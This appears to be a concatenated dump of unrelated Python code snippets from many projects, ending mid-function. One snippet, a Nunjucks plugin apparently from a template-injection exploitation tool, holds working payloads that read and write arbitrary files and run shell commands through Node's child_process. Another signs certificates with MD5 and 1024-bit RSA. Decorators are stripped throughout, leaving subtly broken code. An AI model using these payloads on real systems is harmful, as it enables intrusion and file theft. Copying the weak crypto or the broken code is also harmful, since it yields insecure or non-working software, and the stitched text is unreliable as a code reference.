MemberNode(member.name, member.member_name, member.type, 'ACTIVE', starting_node)
def _build_group_tree(self):
root = MemberNode(MY_CUSTOMER, MY_CUSTOMER)
model_manager = self.service_config.model_manager
(scoped_session, data_access) = model_manager.get(self.model_name)
with scoped_session as session:
all_groups = data_access.iter_groups(session)
for group in all_groups:
group_node = MemberNode(group.name, group.member_name, group.type, 'ACTIVE', root)
self._get_recursive_members(group_node)
LOGGER.debug(anytree.RenderTree(root, style=anytree.AsciiStyle()).by_attr('member_email'))
return root
def _retrieve(self):
root = self._build_group_tree()
return root
def run(self):
root = self._retrieve()
group_rules = file_loader.read_and_parse_file(self.rules)
root = self._apply_all_rules(root, group_rules)
all_violations = self._find_violations(root)
self._output_results(all_violations) |
class Nunjucks(javascript.Javascript):
def init(self):
self.update_actions({'render': {'render': '{{%(code)s}}', 'header': '{{%(header)s}}', 'trailer': '{{%(trailer)s}}', 'test_render': ('(%(n1)s,%(n2)s*%(n3)s)|dump' % {'n1': rand.randints[0], 'n2': rand.randints[1], 'n3': rand.randints[2]}), 'test_render_expected': ('%(res)s' % {'res': (rand.randints[1] * rand.randints[2])})}, 'write': {'call': 'inject', 'write': '{{range.constructor("global.process.mainModule.require(\'fs\').appendFileSync(\'%(path)s\', Buffer(\'%(chunk_b64)s\', \'base64\'), \'binary\')")()}}', 'truncate': '{{range.constructor("global.process.mainModule.require(\'fs\').writeFileSync(\'%(path)s\', \'\')")()}}'}, 'read': {'call': 'evaluate', 'read': "global.process.mainModule.require('fs').readFileSync('%(path)s').toString('base64')"}, 'md5': {'call': 'evaluate', 'md5': 'global.process.mainModule.require(\'crypto\').createHash(\'md5\').update(global.process.mainModule.require(\'fs\').readFileSync(\'%(path)s\')).digest("hex")'}, 'evaluate': {'call': 'render', 'evaluate': 'range.constructor("return eval(Buffer(\'%(code_b64)s\',\'base64\').toString())")()', 'test_os': "global.process.mainModule.require('os').platform()"}, 'execute': {'call': 'evaluate', 'execute': "global.process.mainModule.require('child_process').execSync(Buffer('%(code_b64)s', 'base64').toString())"}, 'execute_blind': {'call': 'inject', 'execute_blind': '{{range.constructor("global.process.mainModule.require(\'child_process\').execSync(Buffer(\'%(code_b64)s\', \'base64\').toString() + \' && sleep %(delay)i\')")()}}'}})
self.set_contexts([{'level': 0}, {'level': 1, 'prefix': '%(closure)s}}', 'suffix': '{{1', 'closures': javascript.ctx_closures}, {'level': 1, 'prefix': '%(closure)s %%}', 'suffix': '', 'closures': javascript.ctx_closures}, {'level': 5, 'prefix': '%(closure)s %%}{%% endfor %%}{%% for a in [1] %%}', 'suffix': '', 'closures': javascript.ctx_closures}, {'level': 5, 'prefix': '%(closure)s = 1 %%}', 'suffix': '', 'closures': javascript.ctx_closures}, {'level': 5, 'prefix': '#}', 'suffix': '{#'}]) |
def test_by_type_multi(events, ball1, ball2, ball3, cue):
assert (filter_type(events, [EventType.STICK_BALL, EventType.SLIDING_ROLLING]) == [stick_ball_collision(cue, ball2, 1), sliding_rolling_transition(ball1, 2), sliding_rolling_transition(ball1, 4), sliding_rolling_transition(ball2, 5), sliding_rolling_transition(ball1, 8), sliding_rolling_transition(ball3, 9)]) |
def test_get_latest_component_id_from_prefix():
agent_config = MagicMock()
expected_component_id = ComponentId(ComponentType.PROTOCOL, PublicId('author', 'name', '0.1.0'))
agent_config.package_dependencies = {expected_component_id}
result = get_latest_component_id_from_prefix(agent_config, expected_component_id.component_prefix)
assert (result == expected_component_id) |
def test_if_revoked_then_permission_denied(rf: RequestFactory) -> None:
(_, key) = APIKey.objects.create_key(name='test', revoked=True)
authorization = f'Api-Key {key}'
request = rf.get('/test/', HTTP_AUTHORIZATION=authorization)
response = view(request)
assert (response.status_code == 403) |
class NetworkML():
def __init__(self, raw_args=None):
self.logger = logging.getLogger(__name__)
log_levels = {'INFO': logging.INFO, 'DEBUG': logging.DEBUG, 'WARNING': logging.WARNING, 'ERROR': logging.ERROR}
self.stage_args = {'parser': {}, 'featurizer': {'srcmacid': {'help': 'attempt to detect canonical source MAC and featurize only that MAC', 'action': 'store_true'}, 'no-srcmacid': {'help': 'featurize all MACs', 'action': 'store_true'}}, 'algorithm': {'trained_model': {'help': 'specify a path to load or save trained model'}, 'label_encoder': {'help': 'specify a path to load or save label encoder'}, 'scaler': {'help': 'specify a path to load or save scaler'}, 'kfolds': {'help': 'specify number of folds for k-fold cross validation'}, 'eval_data': {'help': 'path to eval CSV file, if training'}, 'train_unknown': {'help': 'Train on unknown roles'}, 'list': {'choices': ['features'], 'default': None, 'help': 'list information contained within model defined by --trained_model'}}}
parsed_args = self.parse_args(raw_args=raw_args)
self.in_path = parsed_args.path
self.algorithm = parsed_args.algorithm
self.engine = parsed_args.engine
self.first_stage = parsed_args.first_stage
self.final_stage = parsed_args.final_stage
self.groups = parsed_args.groups
self.gzip_opt = parsed_args.gzip
self.level = parsed_args.level
self.operation = parsed_args.operation
self.output = parsed_args.output
self.threads = parsed_args.threads
self.list = parsed_args.list
self.log_level = parsed_args.verbose
for args in self.stage_args.values():
for arg in args:
val = getattr(parsed_args, arg, None)
if (val is not None):
setattr(self, arg, val)
logging.basicConfig(level=log_levels[self.log_level])
self.main()
def parse_args(self, raw_args=None):
parser = argparse.ArgumentParser(description=('networkml %s' % __version__))
parser.add_argument('path', help='path to a single pcap file, or a directory of pcaps to parse', default='/pcaps')
parser.add_argument('--algorithm', '-a', choices=['host_footprint'], default='host_footprint', help='choose which algorithm to use (default=host_footprint)')
parser.add_argument('--engine', '-e', choices=['pyshark', 'tshark', 'host'], default='tshark', help='engine to use to process the PCAP file (default=tshark)')
parser.add_argument('--first_stage', '-f', choices=['parser', 'featurizer', 'algorithm'], default='parser', help='choose which stage to start at, `path` arg is relative to stage (default=parser)')
parser.add_argument('--final_stage', choices=['parser', 'featurizer', 'algorithm'], default='algorithm', help='choose which stage to finish at (default=algorithm)')
parser.add_argument('--groups', '-g', default='host', help='groups of comma separated features to use (default=host)')
parser.add_argument('--gzip', '-z', choices=['input', 'output', 'both'], default='both', help='use gzip between stages, useful when not using all 3 stages (default=both)')
parser.add_argument('--level', '-l', choices=['packet', 'flow', 'host'], default='packet', help='level to make the output records (default=packet)')
parser.add_argument('--operation', '-O', choices=['train', 'predict', 'eval'], default='predict', help='choose which operation task to perform, train or predict (default=predict)')
parser.add_argument('--output', '-o', default=None, help='directory to write out any results files to')
parser.add_argument('--threads', '-t', default=1, type=int, help='number of async threads to use (default=1)')
parser.add_argument('--verbose', '-v', choices=['DEBUG', 'INFO', 'WARNING', 'ERROR'], default='INFO', help='logging level (default=INFO)')
for (stage, args) in self.stage_args.items():
for (arg, arg_parms) in args.items():
arg_help = ('%s (%s)' % (arg_parms['help'], stage))
arg_choices = (arg_parms['choices'] if ('choices' in arg_parms) else None)
arg_default = (arg_parms['default'] if ('default' in arg_parms) else None)
action = arg_parms.get('action', 'store')
if (not arg_choices):
parser.add_argument(('--' + arg), action=action, help=arg_help, default=arg_default, dest=arg)
else:
parser.add_argument(('--' + arg), help=arg_help, choices=arg_choices, default=arg_default, dest=arg, action=action)
parsed_args = parser.parse_args(raw_args)
return parsed_args
def add_opt_args(self, opt_args):
raw_args = []
for (arg, arg_parms) in opt_args.items():
val = getattr(self, arg, None)
if (val is not None):
raw_args.append(('--' + arg))
if (arg_parms.get('action', None) != 'store_true'):
raw_args.append(str(val))
return raw_args
def run_parser_stage(self, in_path):
raw_args = self.add_opt_args(self.stage_args['parser'])
raw_args.extend(['-e', self.engine, '-l', self.level, '-o', self.output, '-t', str(self.threads), '-v', self.log_level, in_path])
instance = PCAPToCSV(raw_args=raw_args)
return instance.main()
def run_featurizer_stage(self, in_path):
raw_args = self.add_opt_args(self.stage_args['featurizer'])
raw_args.extend(['-c', '-g', self.groups, '-z', self.gzip_opt, '-o', self.output, '-t', str(self.threads), '-v', self.log_level, in_path])
instance = CSVToFeatures(raw_args=raw_args)
return instance.main()
def run_algorithm_stage(self, in_path):
raw_args = self.add_opt_args(self.stage_args['algorithm'])
raw_args.extend(['-O', self.operation, '-v', self.log_level, in_path])
instance = HostFootprint(raw_args=raw_args)
return instance.main()
def output_results(self, result_json_str, run_complete):
if run_complete:
if self.list:
print(f'{result_json_str}')
if ((self.final_stage == 'algorithm') and (self.operation == 'predict')):
if (self.output and os.path.isdir(self.output)):
uid = os.getenv('id', 'None')
file_path = os.getenv('file_path', self.in_path)
results_outputter = ResultsOutput(self.logger, uid, file_path)
result_json_file_name = os.path.join(self.output, 'predict.json')
results_outputter.output_from_result_json(result_json_str, result_json_file_name)
def run_stages(self):
stages = ('parser', 'featurizer', 'algorithm')
stage_runners = {'parser': self.run_parser_stage, 'featurizer': self.run_featurizer_stage, 'algorithm': self.run_algorithm_stage}
try:
first_stage_index = stages.index(self.first_stage)
final_stage_index = stages.index(self.final_stage)
except ValueError:
self.logger.error('Unknown first/final stage name')
return
if (first_stage_index > final_stage_index):
self.logger.error('Invalid first and final stage combination')
return
run_schedule = stages[first_stage_index:(final_stage_index + 1)]
result = self.in_path
self.logger.info(f'running stages: {run_schedule}')
run_complete = False
try:
for stage in run_schedule:
runner = stage_runners[stage]
result = runner(result)
run_complete = True
except Exception as err:
self.logger.error(f'Could not run stage: {err}')
self.output_results(result, run_complete)
def main(self):
self.run_stages() |
def event_from_ce_helper(raw: _ce.CloudEvent, cls, app_id=True):
event_attributes = raw._get_attributes()
event_data: _typing.Any = raw.get_data()
event_dict = {**event_data, **event_attributes}
alert_type: str = event_dict['alerttype']
event_kwargs = {'alert_type': alert_type, 'data': firebase_alert_data_from_ce(event_dict), 'id': event_dict['id'], 'source': event_dict['source'], 'specversion': event_dict['specversion'], 'subject': (event_dict['subject'] if ('subject' in event_dict) else None), 'time': _util.timestamp_conversion(event_dict['time']), 'type': event_dict['type']}
if app_id:
event_kwargs['app_id'] = event_dict.get('appid')
return cls(**event_kwargs) |
def generate_adhoc_ssl_pair(cn=None):
from random import random
crypto = _get_openssl_crypto_module()
if (cn is None):
cn = '*'
cert = crypto.X509()
cert.set_serial_number(int((random() * sys.maxsize)))
cert.gmtime_adj_notBefore(0)
cert.gmtime_adj_notAfter((((60 * 60) * 24) * 365))
subject = cert.get_subject()
subject.CN = cn
subject.O = 'Dummy Certificate'
issuer = cert.get_issuer()
issuer.CN = 'Untrusted Authority'
issuer.O = 'Self-Signed'
pkey = crypto.PKey()
pkey.generate_key(crypto.TYPE_RSA, 1024)
cert.set_pubkey(pkey)
cert.sign(pkey, 'md5')
return (cert, pkey) |
class Fileheader(BasicObject):
attributes = {'SEQUENCE-NUMBER': utils.scalar, 'ID': utils.scalar}
def __init__(self, attic, lf):
super().__init__(attic, lf=lf)
def sequencenr(self):
return self['SEQUENCE-NUMBER']
def id(self):
return self['ID']
def describe_attr(self, buf, width, indent, exclude):
d = OrderedDict()
d['Description'] = self.id
d['Position in storage set'] = self.sequencenr
utils.describe_dict(buf, d, width, indent, exclude) |
class BinomialLogitTest(unittest.TestCase):
def test_constant_binomial_logit_graph(self) -> None:
observations = {}
queries_observed = [add()]
graph_observed = BMGInference().to_dot(queries_observed, observations)
graph_expected = '\ndigraph "graph" {\n N0[label=100];\n N1[label=0.];\n N2[label=Binomial];\n N3[label=Sample];\n N4[label=Sample];\n N5[label=ToPosReal];\n N6[label=ToPosReal];\n N7[label="+"];\n N8[label=Query];\n N0 -> N2;\n N1 -> N2;\n N2 -> N3;\n N2 -> N4;\n N3 -> N5;\n N4 -> N6;\n N5 -> N7;\n N6 -> N7;\n N7 -> N8;\n}\n'
self.assertEqual(graph_observed.strip(), graph_expected.strip())
def test_binomial_normal_logit_graph(self) -> None:
observations = {}
queries_observed = [binomial_normal_logit()]
graph_observed = BMGInference().to_dot(queries_observed, observations)
graph_expected = '\ndigraph "graph" {\n N0[label=0.0];\n N1[label=1.0];\n N2[label=Normal];\n N3[label=Sample];\n N4[label=100];\n N5[label=Logistic];\n N6[label=Binomial];\n N7[label=Sample];\n N8[label=Query];\n N0 -> N2;\n N1 -> N2;\n N2 -> N3;\n N3 -> N5;\n N4 -> N6;\n N5 -> N6;\n N6 -> N7;\n N7 -> N8;\n}\n'
self.assertEqual(graph_observed.strip(), graph_expected.strip()) |
def test_dont_use_wrapper_location():
m = importlib.import_module('tests.flytekit.unit.core.flyte_functools.decorator_usage')
get_data_task = getattr(m, 'get_data')
assert ('decorator_source' not in get_data_task.name)
assert ('decorator_usage' in get_data_task.name)
(a, b, c, _) = extract_task_module(get_data_task)
assert ((a, b, c) == ('tests.flytekit.unit.core.flyte_functools.decorator_usage.get_data', 'tests.flytekit.unit.core.flyte_functools.decorator_usage', 'get_data')) |
def main():
manager = CompilerManager()
compiler_pyqt4 = manager.find_compiler('PyQt4')
compiler_pyside = manager.find_compiler('PySide')
compiler_pyside2 = manager.find_compiler('PySide2')
ui_files = []
path = os.path.dirname(__file__)
ui_path = os.path.join(path, 'ui_files')
output_path = os.path.join(path, 'ui_compiled')
for ui_file in glob.glob1(ui_path, '*.ui'):
full_path = os.path.join(ui_path, ui_file)
ui_files.append(UIFile(full_path))
for ui_file in ui_files:
print('')
print(('ui_file: %s' % ui_file.filename))
assert isinstance(ui_file, UIFile)
py_file_pyqt4 = compiler_pyqt4.get_py_file(ui_file, output_path)
py_file_pyside = compiler_pyside.get_py_file(ui_file, output_path)
py_file_pyside2 = compiler_pyside2.get_py_file(ui_file, output_path)
renew_md5 = False
print(('ui_file.is_new() : %s' % ui_file.is_new()))
print(('py_file_pyqt4.exists() : %s' % py_file_pyqt4.exists()))
print(('py_file_pyside.exists() : %s' % py_file_pyside.exists()))
print(('py_file_pyside2.exists(): %s' % py_file_pyside2.exists()))
if (ui_file.is_new() or (not py_file_pyqt4.exists())):
print('re-compiling PyQt4 version')
renew_md5 = True
try:
compiler_pyqt4.compile(ui_file, output_path)
except RuntimeError:
pass
if (ui_file.is_new() or (not py_file_pyside.exists())):
print('re-compiling PySide version')
renew_md5 = True
try:
compiler_pyside.compile(ui_file, output_path)
except RuntimeError:
pass
if (ui_file.is_new() or (not py_file_pyside2.exists())):
print('re-compiling PySide2 version')
renew_md5 = True
try:
compiler_pyside2.compile(ui_file, output_path)
except RuntimeError:
pass
if renew_md5:
print('Renewing the MD5 file!')
ui_file.update_md5_file()
print('Finished compiling') |
class Test_vrrpv3_ipv6(unittest.TestCase):
version = vrrp.VRRP_VERSION_V3
type_ = vrrp.VRRP_TYPE_ADVERTISEMENT
vrid = 128
priority = 99
count_ip = 1
max_adver_int = 111
checksum = 0
ip_address = '2001:db8:2000::1'
vrrpv3 = vrrp.vrrpv3.create(type_, vrid, priority, max_adver_int, [ip_address])
buf = struct.pack((vrrp.vrrpv3._PACK_STR + '16s'), vrrp.vrrp_to_version_type(vrrp.VRRP_VERSION_V3, type_), vrid, priority, count_ip, max_adver_int, checksum, addrconv.ipv6.text_to_bin(ip_address))
def setUp(self):
pass
def tearDown(self):
pass
def test_init(self):
eq_(self.type_, self.vrrpv3.type)
eq_(self.vrid, self.vrrpv3.vrid)
eq_(self.priority, self.vrrpv3.priority)
eq_(self.count_ip, self.vrrpv3.count_ip)
eq_(1, len(self.vrrpv3.ip_addresses))
eq_(self.ip_address, self.vrrpv3.ip_addresses[0])
def test_parser(self):
(vrrpv3, _cls, _) = self.vrrpv3.parser(self.buf)
eq_(self.version, vrrpv3.version)
eq_(self.type_, vrrpv3.type)
eq_(self.vrid, vrrpv3.vrid)
eq_(self.priority, vrrpv3.priority)
eq_(self.count_ip, vrrpv3.count_ip)
eq_(self.max_adver_int, vrrpv3.max_adver_int)
eq_(self.checksum, vrrpv3.checksum)
eq_(1, len(vrrpv3.ip_addresses))
eq_(str, type(vrrpv3.ip_addresses[0]))
eq_(self.ip_address, vrrpv3.ip_addresses[0])
def test_serialize(self):
src_ip = '2001:db8:2000::1'
dst_ip = vrrp.VRRP_IPV6_DST_ADDRESS
prev = ipv6.ipv6(6, 0, 0, 0, inet.IPPROTO_VRRP, vrrp.VRRP_IPV6_HOP_LIMIT, src_ip, dst_ip)
type_ = vrrp.VRRP_TYPE_ADVERTISEMENT
vrid = 5
priority = 10
max_adver_int = 30
ip_address = '2001:db8:2000::2'
ip_addresses = [ip_address]
vrrp_ = vrrp.vrrpv3.create(type_, vrid, priority, max_adver_int, ip_addresses)
buf = vrrp_.serialize(bytearray(), prev)
print(len(buf), type(buf), buf)
pack_str = (vrrp.vrrpv3._PACK_STR + '16s')
pack_len = struct.calcsize(pack_str)
res = struct.unpack(pack_str, six.binary_type(buf))
eq_(res[0], vrrp.vrrp_to_version_type(vrrp.VRRP_VERSION_V3, type_))
eq_(res[1], vrid)
eq_(res[2], priority)
eq_(res[3], len(ip_addresses))
eq_(res[4], max_adver_int)
eq_(res[6], addrconv.ipv6.text_to_bin(ip_address))
eq_(len(buf), pack_len)
print(res)
ph = struct.pack('!16s16sI3xB', addrconv.ipv6.text_to_bin(src_ip), addrconv.ipv6.text_to_bin(dst_ip), pack_len, inet.IPPROTO_VRRP)
s = packet_utils.checksum((ph + buf))
eq_(0, s)
(Exception)
def test_malformed_vrrpv3(self):
m_short_buf = self.buf[1:vrrp.vrrpv3._MIN_LEN]
vrrp.vrrp.parser(m_short_buf)
def test_create_packet(self):
primary_ip = '2001:db8:2000::3'
p0 = self.vrrpv3.create_packet(primary_ip)
p0.serialize()
print(len(p0.data), p0.data)
p1 = packet.Packet(six.binary_type(p0.data))
p1.serialize()
print(len(p0.data), p0.data)
print(len(p1.data), p1.data)
eq_(p0.data, p1.data)
def test_to_string(self):
vrrpv3_values = {'version': self.version, 'type': self.type_, 'vrid': self.vrid, 'priority': self.priority, 'count_ip': self.count_ip, 'max_adver_int': self.max_adver_int, 'checksum': self.vrrpv3.checksum, 'ip_addresses': [self.ip_address], 'auth_type': None, 'auth_data': None, 'identification': self.vrrpv3.identification}
_vrrpv3_str = ','.join([('%s=%s' % (k, repr(vrrpv3_values[k]))) for (k, v) in inspect.getmembers(self.vrrpv3) if (k in vrrpv3_values)])
vrrpv3_str = ('%s(%s)' % (vrrp.vrrpv3.__name__, _vrrpv3_str))
eq_(str(self.vrrpv3), vrrpv3_str)
eq_(repr(self.vrrpv3), vrrpv3_str) |
def get_tax_account_head(tax, charge_type: Optional[Literal[('shipping', 'sales_tax')]]=None):
tax_title = str(tax.get('title'))
tax_account = frappe.db.get_value('Shopify Tax Account', {'parent': SETTING_DOCTYPE, 'shopify_tax': tax_title}, 'tax_account')
if ((not tax_account) and charge_type):
tax_account = frappe.db.get_single_value(SETTING_DOCTYPE, DEFAULT_TAX_FIELDS[charge_type])
if (not tax_account):
frappe.throw(_('Tax Account not specified for Shopify Tax {0}').format(tax.get('title')))
return tax_account |
class OptionSeriesScatter3dSonificationTracksMappingRate(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
def start_notification(fledge_url, add_service, add_notification_instance, wait_time, retries):
add_service(fledge_url, 'notification', None, retries, installation_type='package', service_name=NOTIF_SERVICE_NAME)
time.sleep(wait_time)
verify_service_added(fledge_url, NOTIF_SERVICE_NAME)
rule_config = {'auditCode': 'CONAD,SCHAD'}
delivery_config = {'enable': 'true'}
add_notification_instance(fledge_url, 'asset', None, rule_config=rule_config, delivery_config=delivery_config, rule_plugin='DataAvailability', installation_type='package', notification_type='retriggered', notification_instance_name='test #1', retrigger_time=5)
notification_url = '/fledge/notification'
resp = utils.get_request(fledge_url, notification_url)
assert ('test #1' in [s['name'] for s in resp['notifications']]) |
class MixupUtil():
def _get_lambda(alpha: float=1.0) -> float:
if (alpha > 0.0):
lam = np.random.beta(alpha, alpha)
else:
lam = 1.0
return lam
def __init__(self, batch_size: int) -> None:
self.indices: torch.Tensor = torch.randperm(batch_size)
self.lam: float = self._get_lambda()
def mixup(self, x: torch.Tensor) -> torch.Tensor:
return ((x * self.lam) + (x[self.indices] * (1 - self.lam)))
def compute_loss(self, criterion: torch.nn.Module, pred: torch.Tensor, original_target: torch.Tensor, mixed_target: torch.Tensor) -> float:
return ((self.lam * criterion(pred, original_target)) + ((1 - self.lam) * criterion(pred, mixed_target)))
def mixup_labels(self, x: torch.Tensor) -> torch.Tensor:
return x[self.indices] |
def extract2GuyztranslationWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
.lbfgs
def test_lbfgs_neb():
kwargs = copy.copy(KWARGS)
kwargs['images'] = 3
kwargs['fix_ends'] = True
k_min = 1000
k_max = (k_min + 10)
neb = NEB(get_geoms(('A', 'B')), k_min=k_min, k_max=k_max, fix_ends=True)
from pysisyphus.optimizers.ConjugateGradient import ConjugateGradient
opt = run_cos_opt(neb, LBFGS, **kwargs)
return opt |
def _build_url(request, obj_or_url):
if (obj_or_url is not None):
if isinstance(obj_or_url, Model):
if DJANGO_BITLY:
url = bitlify(obj_or_url)
if (not BITLY_REGEX.match(url)):
return request.build_absolute_uri(obj_or_url.get_absolute_url())
else:
return url
else:
return request.build_absolute_uri(obj_or_url.get_absolute_url())
else:
return request.build_absolute_uri(obj_or_url)
return '' |
class ScheduleBEfile(BaseRawItemized):
__tablename__ = 'real_efile_sb4'
line_number = db.Column('line_num', db.String)
file_number = db.Column('repid', db.Integer, index=True, primary_key=True)
related_line_number = db.Column('rel_lineno', db.Integer, primary_key=True)
committee_id = db.Column('comid', db.String, doc=docs.COMMITTEE_ID)
recipient_name = db.Column('lname', db.String)
recipient_city = db.Column('city', db.String)
recipient_state = db.Column('state', db.String)
recipient_zip = db.Column('zip', db.String)
recipient_prefix = db.Column('prefix', db.String)
recipient_suffix = db.Column('suffix', db.String)
beneficiary_committee_name = db.Column('ben_comname', db.String)
disbursement_type = db.Column('dis_code', db.String)
disbursement_description = db.Column('transdesc', db.String)
disbursement_date = db.Column('date_dis', db.Date)
disbursement_amount = db.Column('amount', db.Numeric(30, 2))
semi_annual_bundled_refund = db.Column('refund', db.Integer)
candidate_office = db.Column('can_off', db.String)
candidate_office_district = db.Column('can_dist', db.String)
filing = db.relationship('EFilings', primaryjoin='and_(\n ScheduleBEfile.file_number == EFilings.file_number,\n )', foreign_keys=file_number, lazy='joined')
committee = db.relationship('CommitteeHistory', primaryjoin="and_(\n ScheduleBEfile.committee_id == CommitteeHistory.committee_id,\n extract('year', ScheduleBEfile.load_timestamp) +cast(extract('year',\n ScheduleBEfile.load_timestamp), Integer) % 2 == CommitteeHistory.cycle,\n )", foreign_keys=committee_id, lazy='joined') |
class TextDescriptorsDriftMetric(Metric[TextDescriptorsDriftMetricResults]):
column_name: str
stattest: Optional[PossibleStatTestType] = None
stattest_threshold: Optional[float] = None
descriptors: Dict[(str, FeatureDescriptor)]
_drift_options: DataDriftOptions
_generated_text_features: Dict[(str, GeneratedFeature)]
def __init__(self, column_name: str, descriptors: Optional[Dict[(str, FeatureDescriptor)]]=None, stattest: Optional[PossibleStatTestType]=None, stattest_threshold: Optional[float]=None, options: AnyOptions=None):
self.column_name = column_name
if descriptors:
self.descriptors = descriptors
else:
self.descriptors = {'Text Length': TextLength(), 'Non Letter Character %': NonLetterCharacterPercentage(), 'OOV %': OOV()}
super().__init__(stattest=stattest, stattest_threshold=stattest_threshold, options=options)
self._generated_text_features = {}
self._drift_options = DataDriftOptions(all_features_stattest=stattest, all_features_threshold=stattest_threshold)
def generated_text_features(self):
return self._generated_text_features
def required_features(self, data_definition: DataDefinition):
column_type = data_definition.get_column(self.column_name).column_type
if (column_type == ColumnType_data.Text):
self._generated_text_features = {name: desc.feature(self.column_name) for (name, desc) in self.descriptors.items()}
return list(self.generated_text_features.values())
return []
def get_parameters(self) -> tuple:
return (self.column_name, self._drift_options)
def calculate(self, data: InputData) -> TextDescriptorsDriftMetricResults:
if (data.reference_data is None):
raise ValueError('Reference dataset should be present')
if self.get_options().render_options.raw_data:
agg_data = False
else:
agg_data = True
curr_text_df = pd.concat([data.get_current_column(x.feature_name()) for x in list(self.generated_text_features.values())], axis=1)
curr_text_df.columns = list(self.generated_text_features.keys())
ref_text_df = pd.concat([data.get_reference_column(x.feature_name()) for x in list(self.generated_text_features.values())], axis=1)
ref_text_df.columns = list(self.generated_text_features.keys())
text_dataset_columns = process_columns(ref_text_df, ColumnMapping(numerical_features=ref_text_df.columns))
drift_by_columns: Dict[(str, ColumnDataDriftMetrics)] = {}
for col in curr_text_df.columns:
drift_by_columns[col] = get_one_column_drift(current_data=curr_text_df, reference_data=ref_text_df, column_name=col, options=self._drift_options, dataset_columns=text_dataset_columns, agg_data=agg_data)
dataset_drift = get_dataset_drift(drift_by_columns, 0)
return TextDescriptorsDriftMetricResults(number_of_columns=curr_text_df.shape[1], number_of_drifted_columns=dataset_drift.number_of_drifted_columns, share_of_drifted_columns=dataset_drift.dataset_drift_score, dataset_drift=dataset_drift.dataset_drift, drift_by_columns=drift_by_columns, dataset_columns=text_dataset_columns) |
class bad_instruction_error_msg(error_msg):
version = 5
type = 1
err_type = 3
def __init__(self, xid=None, code=None, data=None):
if (xid != None):
self.xid = xid
else:
self.xid = None
if (code != None):
self.code = code
else:
self.code = 0
if (data != None):
self.data = data
else:
self.data = ''
return
def pack(self):
packed = []
packed.append(struct.pack('!B', self.version))
packed.append(struct.pack('!B', self.type))
packed.append(struct.pack('!H', 0))
packed.append(struct.pack('!L', self.xid))
packed.append(struct.pack('!H', self.err_type))
packed.append(struct.pack('!H', self.code))
packed.append(self.data)
length = sum([len(x) for x in packed])
packed[2] = struct.pack('!H', length)
return ''.join(packed)
def unpack(reader):
obj = bad_instruction_error_msg()
_version = reader.read('!B')[0]
assert (_version == 5)
_type = reader.read('!B')[0]
assert (_type == 1)
_length = reader.read('!H')[0]
orig_reader = reader
reader = orig_reader.slice(_length, 4)
obj.xid = reader.read('!L')[0]
_err_type = reader.read('!H')[0]
assert (_err_type == 3)
obj.code = reader.read('!H')[0]
obj.data = str(reader.read_all())
return obj
def __eq__(self, other):
if (type(self) != type(other)):
return False
if (self.xid != other.xid):
return False
if (self.code != other.code):
return False
if (self.data != other.data):
return False
return True
def pretty_print(self, q):
q.text('bad_instruction_error_msg {')
with q.group():
with q.indent(2):
q.breakable()
q.text('xid = ')
if (self.xid != None):
q.text(('%#x' % self.xid))
else:
q.text('None')
q.text(',')
q.breakable()
q.text('code = ')
value_name_map = {0: 'OFPBIC_UNKNOWN_INST', 1: 'OFPBIC_UNSUP_INST', 2: 'OFPBIC_BAD_TABLE_ID', 3: 'OFPBIC_UNSUP_METADATA', 4: 'OFPBIC_UNSUP_METADATA_MASK', 5: 'OFPBIC_BAD_EXPERIMENTER', 6: 'OFPBIC_BAD_EXPERIMENTER_TYPE', 7: 'OFPBIC_BAD_LEN', 8: 'OFPBIC_EPERM', 9: 'OFPBIC_DUP_INST'}
if (self.code in value_name_map):
q.text(('%s(%d)' % (value_name_map[self.code], self.code)))
else:
q.text(('%#x' % self.code))
q.text(',')
q.breakable()
q.text('data = ')
q.pp(self.data)
q.breakable()
q.text('}') |
class CoprPermission(db.Model, helpers.Serializer):
copr_builder = db.Column(db.SmallInteger, default=0)
copr_admin = db.Column(db.SmallInteger, default=0)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), primary_key=True)
user = db.relationship('User', backref=db.backref('copr_permissions_unfiltered'))
copr_id = db.Column(db.Integer, db.ForeignKey('copr.id'), primary_key=True, index=True)
copr = db.relationship('Copr', backref=db.backref('copr_permissions'))
def set_permission(self, name, value):
if (name == 'admin'):
self.copr_admin = value
elif (name == 'builder'):
self.copr_builder = value
else:
raise KeyError('{0} is not a valid copr permission'.format(name))
def get_permission(self, name):
if (name == 'admin'):
return (0 if (self.copr_admin is None) else self.copr_admin)
if (name == 'builder'):
return (0 if (self.copr_builder is None) else self.copr_builder)
raise KeyError('{0} is not a valid copr permission'.format(name)) |
class OptionSeriesArcdiagramStatesHoverMarker(Options):
def enabled(self):
return self._config_get(None)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def enabledThreshold(self):
return self._config_get(2)
def enabledThreshold(self, num: float):
self._config(num, js_type=False)
def fillColor(self):
return self._config_get(None)
def fillColor(self, text: str):
self._config(text, js_type=False)
def height(self):
return self._config_get(None)
def height(self, num: float):
self._config(num, js_type=False)
def lineColor(self):
return self._config_get('#ffffff')
def lineColor(self, text: str):
self._config(text, js_type=False)
def lineWidth(self):
return self._config_get(0)
def lineWidth(self, num: float):
self._config(num, js_type=False)
def radius(self):
return self._config_get(4)
def radius(self, num: float):
self._config(num, js_type=False)
def width(self):
return self._config_get(None)
def width(self, num: float):
self._config(num, js_type=False) |
def _new_metrics_from_model_output(last_metric: ModelInferenceMetrics, is_first_generate: bool, usage: Optional[Dict]=None) -> ModelInferenceMetrics:
metrics = ModelInferenceMetrics.create_metrics(last_metric)
metrics.collect_index = (last_metric.collect_index + 1)
if is_first_generate:
logger.info(f'is_first_generate, usage: {usage}')
metrics.first_completion_time_ms = (time.time_ns() // 1000000)
if ((not usage) or (not isinstance(usage, dict))):
return metrics
prompt_tokens = usage.get('prompt_tokens')
completion_tokens = usage.get('completion_tokens')
total_tokens = usage.get('total_tokens')
if (prompt_tokens is None):
